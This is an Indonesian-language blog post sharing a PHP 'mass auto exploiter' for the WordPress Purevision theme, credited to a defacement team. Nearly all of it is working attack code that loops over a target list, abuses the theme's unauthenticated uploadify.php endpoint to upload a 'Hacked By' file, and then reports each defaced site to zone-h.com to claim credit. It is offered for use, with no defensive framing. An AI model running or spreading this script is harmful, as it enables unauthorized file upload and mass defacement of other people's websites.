Flash Go

Wordpress Purevision Themes Auto Exploiter

Wordpress Purevision Themes Auto Exploiter - Hallo sahabat Minato ET, Pada Artikel yang anda baca kali ini dengan judul Wordpress Purevision Themes Auto Exploiter, kami telah mempersiapkan artikel ini dengan baik untuk anda baca dan ambil informasi didalamnya. mudah-mudahan isi postingan Artikel Auto3xploi7ed, Artikel Tools, yang kami tulis ini dapat anda pahami. baiklah, selamat membaca.

Judul : Wordpress Purevision Themes Auto Exploiter
link : Wordpress Purevision Themes Auto Exploiter

Baca juga


Wordpress Purevision Themes Auto Exploiter


#- Wordpress WP Purevision Themes Mass Exploiter
#- Coded By : Synchronizer
#- Team : Sanjungan Jiwa Team
#- Using this Tool >> php sync.php list.txt
#- Example >> Name.php = This file name | list.txt = your list target

------------------



Code:
<?php
# Wordpress WP Purevision Themes Mass Exploiter
# Coded By : Synchronizer
# Team : Sanjungan Jiwa Team
# Using this Exploit >> php sync.php list.txt
# Example >> Name.php = This file name | list.txt = your list target
# Thanks to : All Member Sanjungan Jiwa Team


@set_time_limit(0);
print"


#==============================================================#
# Wordpress Purevision Themes Mass & Auto Exploiter #
#--------------------------------------------------------------#
# Coded By Synchronizer #
# Merubah Copyright, tidak menjadikan anda seorang coder #
# WE ARESANJUNGAN JIWA TEAM #
#==============================================================#


";


echo "\n";

$get=file_get_contents($argv[1]);
$j=explode("\r\n",$get);
foreach($j as $site){
echo "\n\n\t[+] Exploiting => ".$site;


$uploadfile="x.txt"; #Your file (give text Hacked by Your Nickname)
$ch =curl_init($site.'/wp-content/themes/purevision/scripts/admin/uploadify/uploadify.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",'folder'=>"/"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$sync = curl_exec($ch);
curl_close($ch);
$access = ($site).'/'.($uploadfile);
$f_sync=@file_get_contents($access);
if(eregi('Hacked By Synchronizer',$f_sync)){ #Edit this text as your Nick/text on your file x.txt
echo "\n\t[x]".'Success => '.$access."\n";
$ch = curl_init ("http://www.zone-h.com/notify/single");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, "defacer=./Synchronizer&domain1=http://$access&hackmode=1&reason=1");
if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch))){
echo "\n\t[x] Zone-h => Ok ". "\n\n";
}else{
echo "\n\t[x] Zone-h => No". "\n\n"; }
curl_close ($ch);
}else{
echo "\n\t[x] ".$site." => Exploiting Failed :( \n\n";


}
}
?>


Demikianlah Artikel Wordpress Purevision Themes Auto Exploiter

Sekianlah artikel Wordpress Purevision Themes Auto Exploiter kali ini, mudah-mudahan bisa memberi manfaat untuk anda semua. baiklah, sampai jumpa di postingan artikel lainnya.

Anda sekarang membaca artikel Wordpress Purevision Themes Auto Exploiter dengan alamat link https://minatoet.blogspot.com/2015/11/wordpress-purevision-themes-auto.html

0 Response to "Wordpress Purevision Themes Auto Exploiter"

Post a Comment